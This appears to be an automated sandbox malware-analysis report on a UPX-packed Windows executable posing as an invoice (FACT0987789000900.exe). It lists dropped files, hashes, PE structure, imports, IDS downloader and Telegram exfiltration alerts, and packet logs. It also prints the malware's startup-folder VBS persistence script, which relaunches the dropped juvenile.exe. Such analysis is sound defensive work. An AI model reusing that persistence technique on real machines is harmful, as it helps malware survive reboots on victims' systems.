Preview:	EA06.....C...U..K...}.6.I.V....I..u..2.2.Rh..y....{..2.F.W..Y.......[..A6.N.sY..A_.J..i..A...,.....9..n.X.k8..cu.%>.....g.u..7..._,..6...4.M.R..I/.M7.[..w9....{..s/.Q7s{..E'.Hu....e8..r.<.U-.N.r@......M......W..f5.......t.W.M..J..T`....9( .'..L@fT...aS.Mj...../.I6..h5^..R...T.M..G..$..Mn.Z..B..a.%J.2.......D...}.....Z.i......Z.....D.s..4_m.Y2.........1..".X...\|6.M.qy...YE..........(.L9.@...X..oU...H.&f...-..X..&..X._....>....A(..)t...MZ..k@.......E&..M.........zq;.B1_..[...\..)\.5z.F.Mr2:$.iL.x .......f..w...a......2..g.+..W5..(.gf....P.lo........V......X.y....Q..4..?..M.....v..^..+...g-b......~.T.k..Z..Q[..p3.e.sX..e.(.....i.U...aE..y.....U`uJ.q..rq.....!.C.t...+..b..g.i[.."4.O2=o..z.p.B5..@;.X.F.E.fmZ\......}....q!./...(.r..O.Gu.o..o.8..Q..L.+1[.t6..'.+...y.Q.k..X...E...T.}..R.R....cc..o&.y.....sE'.-.M...%.....@...>.D.U.[...C.[.U.-..v.Zu...V.!..z.oB...Pf..O.KW.U&..m..D...9.lR)....i.D....x]......&1.&...,u../T.aOc\.uKi......z...

C:\Users\user\AppData\Local\Temp\autC94A.tmp

Download File

Process:	C:\Users\user\AppData\Local\thixolabile\juvenile.exe
File Type:	data
Category:	dropped
Size (bytes):	202424
Entropy (8bit):	7.98496561474961
Encrypted:	false
SSDEEP:	6144:HsqRLT5hm7qJvUW7JOQVnr2R+UtSXAU3xRgO5aIf:HJRLrmWXNznScUtmA6CO48
MD5:	680BA9E14DFE80F9E58D784B4A8B4812
SHA1:	D269305611A554ABC239C8E5011045A67F0315E7
SHA-256:	057F87AE282514DCE6DC80C50372A1F0F0B0CE5889A0B1BC6EE8D340C53FF310
SHA-512:	3A5BAD82E729E15126C687440B40331AE5D3DEB774366875F00D5067C4FEB0A3FF64336C15BA853CA99F87BBA6DA8AC21E0D91749C487C1958B7741024D050BC
Malicious:	false
Reputation:	low
Preview:	EA06.....C...U..K...}.6.I.V....I..u..2.2.Rh..y....{..2.F.W..Y.......[..A6.N.sY..A_.J..i..A...,.....9..n.X.k8..cu.%>.....g.u..7..._,..6...4.M.R..I/.M7.[..w9....{..s/.Q7s{..E'.Hu....e8..r.<.U-.N.r@......M......W..f5.......t.W.M..J..T`....9( .'..L@fT...aS.Mj...../.I6..h5^..R...T.M..G..$..Mn.Z..B..a.%J.2.......D...}.....Z.i......Z.....D.s..4_m.Y2.........1..".X...\|6.M.qy...YE..........(.L9.@...X..oU...H.&f...-..X..&..X._....>....A(..)t...MZ..k@.......E&..M.........zq;.B1_..[...\..)\.5z.F.Mr2:$.iL.x .......f..w...a......2..g.+..W5..(.gf....P.lo........V......X.y....Q..4..?..M.....v..^..+...g-b......~.T.k..Z..Q[..p3.e.sX..e.(.....i.U...aE..y.....U`uJ.q..rq.....!.C.t...+..b..g.i[.."4.O2=o..z.p.B5..@;.X.F.E.fmZ\......}....q!./...(.r..O.Gu.o..o.8..Q..L.+1[.t6..'.+...y.Q.k..X...E...T.}..R.R....cc..o&.y.....sE'.-.M...%.....@...>.D.U.[...C.[.U.-..v.Zu...V.!..z.oB...Pf..O.KW.U&..m..D...9.lR)....i.D....x]......&1.&...,u../T.aOc\.uKi......z...

C:\Users\user\AppData\Local\Temp\autFA4D.tmp

Download File

Process:	C:\Users\user\AppData\Local\thixolabile\juvenile.exe
File Type:	data
Category:	dropped
Size (bytes):	202424
Entropy (8bit):	7.98496561474961
Encrypted:	false
SSDEEP:	6144:HsqRLT5hm7qJvUW7JOQVnr2R+UtSXAU3xRgO5aIf:HJRLrmWXNznScUtmA6CO48
MD5:	680BA9E14DFE80F9E58D784B4A8B4812
SHA1:	D269305611A554ABC239C8E5011045A67F0315E7
SHA-256:	057F87AE282514DCE6DC80C50372A1F0F0B0CE5889A0B1BC6EE8D340C53FF310
SHA-512:	3A5BAD82E729E15126C687440B40331AE5D3DEB774366875F00D5067C4FEB0A3FF64336C15BA853CA99F87BBA6DA8AC21E0D91749C487C1958B7741024D050BC
Malicious:	false
Reputation:	low
Preview:	EA06.....C...U..K...}.6.I.V....I..u..2.2.Rh..y....{..2.F.W..Y.......[..A6.N.sY..A_.J..i..A...,.....9..n.X.k8..cu.%>.....g.u..7..._,..6...4.M.R..I/.M7.[..w9....{..s/.Q7s{..E'.Hu....e8..r.<.U-.N.r@......M......W..f5.......t.W.M..J..T`....9( .'..L@fT...aS.Mj...../.I6..h5^..R...T.M..G..$..Mn.Z..B..a.%J.2.......D...}.....Z.i......Z.....D.s..4_m.Y2.........1..".X...\|6.M.qy...YE..........(.L9.@...X..oU...H.&f...-..X..&..X._....>....A(..)t...MZ..k@.......E&..M.........zq;.B1_..[...\..)\.5z.F.Mr2:$.iL.x .......f..w...a......2..g.+..W5..(.gf....P.lo........V......X.y....Q..4..?..M.....v..^..+...g-b......~.T.k..Z..Q[..p3.e.sX..e.(.....i.U...aE..y.....U`uJ.q..rq.....!.C.t...+..b..g.i[.."4.O2=o..z.p.B5..@;.X.F.E.fmZ\......}....q!./...(.r..O.Gu.o..o.8..Q..L.+1[.t6..'.+...y.Q.k..X...E...T.}..R.R....cc..o&.y.....sE'.-.M...%.....@...>.D.U.[...C.[.U.-..v.Zu...V.!..z.oB...Pf..O.KW.U&..m..D...9.lR)....i.D....x]......&1.&...,u../T.aOc\.uKi......z...

C:\Users\user\AppData\Local\Temp\retrofits

Download File

Process:	C:\Users\user\Desktop\FACT0987789000900.exe
File Type:	data
Category:	modified
Size (bytes):	208384
Entropy (8bit):	7.840428585900424
Encrypted:	false
SSDEEP:	3072:Umk3sCWAHAe8PggU+u5FVeKS3+2g+ELRkIXrdE9lsHmA+fZGA9NKNqH0qPSiUFC3:94VmLU+geznkzW9yHm5fZfMIRPqc
MD5:	1DE0DE821CDC7ED14FF1BFD93026DB40
SHA1:	FB5AB1B9E9414A01A2DBCD484F83FCB3C16D64DA
SHA-256:	F45668DCACB906045ACEAB063720F682868D9A411DD9E646E5A6FC8067B37EB5
SHA-512:	D9D7F29D65A4FC4541FD9F753B19D0ECB6C359CFA84352DEF53CD26DF21F8C3EE002DE834D587793B6DBE5743B147378BFE4C9860CE36989C04CB1D5A4EE2F02
Malicious:	false
Reputation:	low
Preview:	...QJERK]ZPG..JI.XWQT5QI.RKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5.IEREF.^G.;.h.Y..ua9 6r;+575 _j'69> .3,e >7z9)av..f5851.\DOvKYZPGA2"Y.u{ .K}8.,g(..ubM4v7.)Z./b4.5u+.9.C.7t{9/HD.7wq"'.!.?.i28u&.g8*-~:.$PGA2JIFXWQT5QIER...6GA2J..XW.U1Q=.R.YZPGA2JI.XtP_4XIE.JYZ.FA2JIFw.QT5AIER.XZPG.2JYFXWST5TIERKYZPBA2JIFXWQ$6QIARK.aRGC2J.FXGQT%QIER[YZ@GA2JIFHWQT5QIERKYZ.RC2.IFXW1V5]DDRKYZPGA2JIFXWQT5QIERKYZPG..KIZXWQT5QIERKYZPGA2JIFXWQT5QIE.F[Z.GA2JIFXWQT5Q.DR.XZPGA2JIFXWQT5QIERKYZPGA2JIh,2) 5QI].JYZ@GA2.HFXSQT5QIERKYZPGA2jIF8y#0T%(ER.4ZPG.3JI(XWQ.4QIERKYZPGA2JI.XW.zQ0=$RKY.`GA2jKFXAQT5[KERKYZPGA2JIFX.QT..;6 (YZPKL3JI&ZWQZ4QIePKYZPGA2JIFXWQ.5Q.ERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPGA2JIFXWQT5QIERKYZPG

C:\Users\user\AppData\Local\thixolabile\juvenile.exe

Download File

Process:	C:\Users\user\Desktop\FACT0987789000900.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	modified
Size (bytes):	641024
Entropy (8bit):	7.940235184135823
Encrypted:	false
SSDEEP:	12288:ROv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPifIl4AbNfoQ+MvFE7v44OzNRlwDmt:Rq5TfcdHj4fmbMo3Jhuv44O5fwY
MD5:	E4DA22458C317595E4BD6712B4728D36
SHA1:	111A5C4CBD45BCED7C04CBEB5192A9AFE178865C
SHA-256:	F3530F9D52D1BA3ED70CC5D603CF0A83771027CDA5FD545206E1688589EF69FD
SHA-512:	B19D9EB5E06834538E8CA5E8655E360B56D63C8AD67441607279C18A848D46A6095B6CBE7019FC79EBA784392278E30134E7AEF149D0E12964D0B86ECD08DC1D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L...5.Fg.........."......P........................@.......................................@...@.......@.....................L...$.......L\|..................p.......................................t...H...........................................UPX0....................................UPX1.....P.......B..................@....rsrc................F..............@......................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Download File

Process:	C:\Users\user\AppData\Local\thixolabile\juvenile.exe
File Type:	data
Category:	modified
Size (bytes):	288
Entropy (8bit):	3.4287539401128218
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclMMlW8g1UEZ+lX1sWpAdA6nriIM8lfQVn:DsO+vNlMkXg1Q1IFmA2n
MD5:	2517302B44120881D322AB75BF87762B
SHA1:	82EBAE9A881FFF27939C491FB07BD939D71C27AC
SHA-256:	48009D6ADB415A2E675B504C4AC960327D9E4ABAC979DD0BEC274F782B0C68E6
SHA-512:	819A5B86B0375C85B5EB50AAC8E7003B36B741FD02AEE51627B1FAD1813A60617A3658D485DE7317C99CDA83878B19D287FFC3561D08E6B7930F6B859294CB3C
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.t.h.i.x.o.l.a.b.i.l.e.\.j.u.v.e.n.i.l.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.940235184135823
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	FACT0987789000900.exe
File size:	641'024 bytes
MD5:	e4da22458c317595e4bd6712b4728d36
SHA1:	111a5c4cbd45bced7c04cbeb5192a9afe178865c
SHA256:	f3530f9d52d1ba3ed70cc5d603cf0a83771027cda5fd545206e1688589ef69fd
SHA512:	b19d9eb5e06834538e8ca5e8655e360b56d63c8ad67441607279c18a848d46a6095b6cbe7019fc79eba784392278e30134e7aef149d0e12964d0b86ecd08dc1d
SSDEEP:	12288:ROv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPifIl4AbNfoQ+MvFE7v44OzNRlwDmt:Rq5TfcdHj4fmbMo3Jhuv44O5fwY
TLSH:	BFD4238164D4C862EAB13731807ACFD51A657F71DDC8279E27C9F54AB8A23835882B3D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x51ff90
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6746EB35 [Wed Nov 27 09:49:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	ef471c0edf1877cd5a881a6a8bf647b9

Entrypoint Preview

Instruction
pushad
mov esi, 004CC000h
lea edi, dword ptr [esi-000CB000h]
push edi
jmp 00007F8ED8CB5B2Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F8ED8CB5B29h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8ED8CB5B0Fh
mov eax, 00000001h
add ebx, ebx
jne 00007F8ED8CB5B29h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F8ED8CB5B2Dh
jne 00007F8ED8CB5B4Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8ED8CB5B41h
dec eax
add ebx, ebx
jne 00007F8ED8CB5B29h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F8ED8CB5AF6h
add ebx, ebx
jne 00007F8ED8CB5B29h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F8ED8CB5B74h
xor ecx, ecx
sub eax, 03h
jc 00007F8ED8CB5B33h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F8ED8CB5B97h
sar eax, 1
mov ebp, eax
jmp 00007F8ED8CB5B2Dh
add ebx, ebx
jne 00007F8ED8CB5B29h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8ED8CB5AEEh
inc ecx
add ebx, ebx
jne 00007F8ED8CB5B29h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F8ED8CB5AE0h
add ebx, ebx
jne 00007F8ED8CB5B29h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F8ED8CB5B11h
jne 00007F8ED8CB5B2Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F8ED8CB5B06h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F8ED8CB5B30h
mov al, byte ptr [edx]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x168c4c	0x424	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x121000	0x47c4c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x169070	0x18	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x120174	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xcb000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1	0xcc000	0x55000	0x54200	b4181e404c9ee33de96861450fa4dd59	False	0.9888239459509658	data	7.937029299204728	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x121000	0x49000	0x48200	a4545d1e2fb0f20d8d4f7c21509cc457	False	0.9290815912045061	data	7.897947363616148	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1215ac	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0x1216d8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0x121804	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0x121930	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0x121c1c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0x121d48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0x122bf4	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0x1234a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0x123a0c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0x125fb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0x127064	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	empty	English	Great Britain	0
RT_STRING	0xca4f0	0x594	empty	English	Great Britain	0
RT_STRING	0xcaa84	0x68a	empty	English	Great Britain	0
RT_STRING	0xcb110	0x490	empty	English	Great Britain	0
RT_STRING	0xcb5a0	0x5fc	empty	English	Great Britain	0
RT_STRING	0xcbb9c	0x65c	empty	English	Great Britain	0
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	1.0097690941385435
RT_STRING	0xcc660	0x158	data	English	Great Britain	1.0319767441860466
RT_RCDATA	0x1274d0	0x41221	data			1.0003410986374797
RT_GROUP_ICON	0x1686f8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x168774	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x16878c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1687a4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1687bc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x16889c	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll	AddAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetSaveFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
MPR.dll	WNetUseConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	socket

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T09:21:12.250715+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49710	132.226.247.73	80	TCP
2025-01-03T09:21:14.219632+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49710	132.226.247.73	80	TCP
2025-01-03T09:21:14.784640+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49727	188.114.96.3	443	TCP
2025-01-03T09:21:15.532027+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49733	132.226.247.73	80	TCP
2025-01-03T09:21:17.391864+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49746	188.114.96.3	443	TCP
2025-01-03T09:21:20.007393+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49768	188.114.96.3	443	TCP
2025-01-03T09:21:21.295929+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49778	188.114.96.3	443	TCP
2025-01-03T09:21:22.599107+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49788	188.114.96.3	443	TCP
2025-01-03T09:21:24.016481+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49797	188.114.96.3	443	TCP
2025-01-03T09:21:24.500797+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49802	132.226.247.73	80	TCP
2025-01-03T09:21:25.002783+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.7	49806	149.154.167.220	443	TCP
2025-01-03T09:21:25.813329+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49802	132.226.247.73	80	TCP
2025-01-03T09:21:26.402935+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49823	188.114.96.3	443	TCP
2025-01-03T09:21:27.157041+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49827	132.226.247.73	80	TCP
2025-01-03T09:21:27.754348+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49833	188.114.96.3	443	TCP
2025-01-03T09:21:28.516421+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49838	132.226.247.73	80	TCP
2025-01-03T09:21:30.401435+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49853	188.114.96.3	443	TCP
2025-01-03T09:21:33.174242+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49874	188.114.96.3	443	TCP
2025-01-03T09:21:36.930173+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.7	49899	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 09:21:11.292973995 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:11.297811985 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:11.297879934 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:11.298098087 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:11.302856922 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:11.990569115 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:11.998090029 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:12.002886057 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:12.209918022 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:12.250715017 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:12.519251108 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:12.519272089 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:12.519336939 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:12.556410074 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:12.556423903 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:13.022186041 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:13.022423029 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:13.050889015 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:13.050923109 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:13.051533937 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:13.094566107 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:13.144942045 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:13.191324949 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:13.400269032 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:13.400336981 CET	443	49720	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:13.400405884 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:13.444734097 CET	49720	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:13.964334011 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:13.969125032 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:14.175678015 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:14.178344011 CET	49727	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:14.178385019 CET	443	49727	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:14.178499937 CET	49727	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:14.178905964 CET	49727	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:14.178919077 CET	443	49727	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:14.219631910 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:14.634911060 CET	443	49727	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:14.641747952 CET	49727	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:14.641777039 CET	443	49727	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:14.784658909 CET	443	49727	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:14.784734011 CET	443	49727	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:14.784802914 CET	49727	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:14.785453081 CET	49727	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:14.793179035 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:14.794469118 CET	49733	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:14.798187017 CET	80	49710	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:14.798257113 CET	49710	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:14.799271107 CET	80	49733	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:14.799336910 CET	49733	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:14.799432039 CET	49733	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:14.805974007 CET	80	49733	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:15.481419086 CET	80	49733	132.226.247.73	192.168.2.7
Jan 3, 2025 09:21:15.482726097 CET	49738	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:15.482753038 CET	443	49738	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:15.482825041 CET	49738	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:15.483042002 CET	49738	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:15.483052969 CET	443	49738	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:15.532027006 CET	49733	80	192.168.2.7	132.226.247.73
Jan 3, 2025 09:21:15.942245007 CET	443	49738	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:15.946826935 CET	49738	443	192.168.2.7	188.114.96.3
Jan 3, 2025 09:21:15.946846962 CET	443	49738	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:16.094043016 CET	443	49738	188.114.96.3	192.168.2.7
Jan 3, 2025 09:21:16.094119072 CET	443	49738	188.114.96.3	192.168.2.7
